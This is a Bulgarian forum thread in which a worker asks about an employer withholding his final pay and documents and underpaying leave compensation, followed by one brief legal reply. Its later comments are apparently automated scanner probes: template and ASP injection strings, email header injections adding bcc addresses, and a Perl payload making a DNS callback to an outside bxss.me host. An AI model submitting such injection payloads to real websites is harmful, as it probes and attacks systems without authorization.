Задържане на документи и неплащане на заплата

13.07.2010г. 08:25:10
Здравейте! Искам да задам един въпрос, относно моето положение в отношенията ми с работодателя, при когото работех и в момента съм в процес на напускане. Подал съм молба за напускане по взаймно съгласие на 9.06.2010г.,срока на предизвестие е един месец т.е.9.07.2010г. До днешна дата 13.07.2010г. съм информиран от счетоводството,че документите са ми готови и оправени само трябва да си си взема,но решавайки да го направя Управителя на фирмата ми заявява,че в момента няма пари и не може да ми изплати последната заплата и обезщетенията за неизползвания полагаем платен отпуск ,защото нямал пари в момента .Щял да го направи, когато имал пари т.е. неизвестен период от време.На мен не ми трябват само документите ,а и парите . Затова не си ги взимам докато не получа полагащото ми се заплащане. Как да процедирам за да получа парите си и изобщо всички документи(всичко заедно) ,има ли срок за законово задържане на документи и пари по този начин,какво да направя за да получа полагащото ми се? В същото положение сме десет (10 )човека от един и същи отдел в една фирма. И друго нещо ,което също ме тормози е: Заплащането на заплатата е пресметнато по уговорената заплата при постъпването ми на работа,а обезщетението за неползвания полагаем платен годишен отпуск по някаква си заплата по която съм осигуряван,която е пъти по- малка от тази ,която реално получавах(с всички напускащи работници процедират така,т.е. цялата фирма получава едни заплати а се осигурява на други, фирмата е около 200 работника,но никой не надига глава заради този проблем ,защото в тази безработица знаете как е ).Законно ли е това и защо работодателя злоупотребява с мен(и другите мой колеги) заради това, че напускаме да сметне заплащането по този начин,нали трябва един ден платена отпуска да е равен на заплащането като за един нормален работен ден на заплатата, която съм получавал реално? Моля, да ме посъветвате!

Правни мнения, съвети и коментари

31.08.2017г. 02:37
Не, не е законно, срок за задържане на документи може да има в махленските счетоводни къщи , неизплащането на заплати и обещание за по-късното е нарушение на трудовотп законодателство, общо взето имате пълното право да заведете дело дори и без документи и да изискате от съда да накара работодателя Ви, като ответник да ги представи. Относно заплатите, от момента на забава дължи и тях и лихви за забава!
lxbfYeaa
05.10.2023г. 07:24
lxbfYeaa
05.10.2023г. 07:24
${9999644+9999740}
lxbfYeaa
05.10.2023г. 07:24
response.write(9539059*9403431)
lxbfYeaa
05.10.2023г. 07:24
'+response.write(9539059*9403431)+'
lxbfYeaa
05.10.2023г. 07:24
"+response.write(9539059*9403431)+"
lxbfYeaa
05.10.2023г. 07:24
&n966093=v910170
lxbfYeaa
05.10.2023г. 07:24
bcc:009247.5555-64325.5555.fe68d.19635.2@bxss.me
lxbfYeaa
05.10.2023г. 07:24
'.gethostbyname(lc('hitho'.'hlxfpvzb93c55.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(67).chr(114).chr(83).'
lxbfYeaa
05.10.2023г. 07:24
to@example.com> bcc:009247.5555-64326.5555.fe68d.19635.2@bxss.me

Коментар